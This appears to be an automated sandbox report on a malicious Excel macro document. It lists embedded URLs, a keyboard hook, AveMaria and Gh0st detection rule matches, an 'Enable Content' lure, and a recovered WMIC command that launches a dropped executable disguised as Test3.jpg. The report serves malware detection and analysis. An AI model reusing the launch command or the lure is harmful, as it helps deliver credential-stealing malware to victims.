        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cdn.entity.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cortana.ai
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cortana.ai/api
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://cr.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://directory.services.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: powershell.exe, 00000003.00000003.731177309.0000000004F95000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.windows.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://graph.windows.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows.local
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://management.azure.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://management.azure.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://messaging.office.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ncus-000.contentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officeapps.live.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://onedrive.live.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://settings.outlook.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: Test3.jpg, 00000013.00000002.948026637.0000000004080000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: Test3.jpg, 00000013.00000002.948026637.0000000004080000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://tasks.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://wus2-000.contentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://www.odwebp.svc.ms

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Installs a global keyboard hookShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: Test3.jpg, 00000012.00000002.782831741.000000000069A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

        E-Banking Fraud:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPEDMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPEDMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 8Screenshot OCR: Enable Editing" form the yellow bar and then click 15 8 "Enable Content" 16 g 17 10 18 11 19 12
        Source: Screenshot number: 8Screenshot OCR: Enable Content X 5 Al - " jG: " : A B C D E F G I H I I I J I K 'T 8 1 9 2 :: : Qil D?'ument
        Source: Screenshot number: 12Screenshot OCR: Enable Editing" form the yellow bar and then click 15 8 "Enable Content" 16 g 17 10 18 11 19 12
        Source: Screenshot number: 12Screenshot OCR: Enable Content X 5 , Al - " jR " :' A B C I D I E, I F I G I H I I I J I K 'T 8 1 I 'k 9 2 ::
        Contains functionality to create processes via WMIShow sources
        Source: WMIC.exe, 00000011.00000002.766074537.0000000000860000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpgWmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\DefaultGL
        Found Excel 4.0 Macro with suspicious formulasShow sources
        Source: Telex06012020.xlsInitial sample: EXEC
        Powershell drops PE fileShow sources
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_0042A85C
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_0042A4FE
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_0043E94B
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034F2760
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034FCF19
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034FBEC8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034F0040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034F003F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034F0040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_034F0CE0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_03520780
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_0352EE08
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_03526470
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_0352BC28
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_0352C4C0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_03521278
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_035287E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_03526470
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_03526470
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_08170006
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_08170040
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_035287D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_0352D588
        Source: Telex06012020.xlsOLE indicator, VBA macros: true
        Source: Joe Sandbox ViewDropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
        Source: Test3.jpg.15.drStatic PE information: Resource name: WM_DSP type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: mvqape5o.dll.10.drStatic PE information: No import functions for PE file found
        Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: Telex06012020.xls, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
        Source: Telex06012020.xls, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
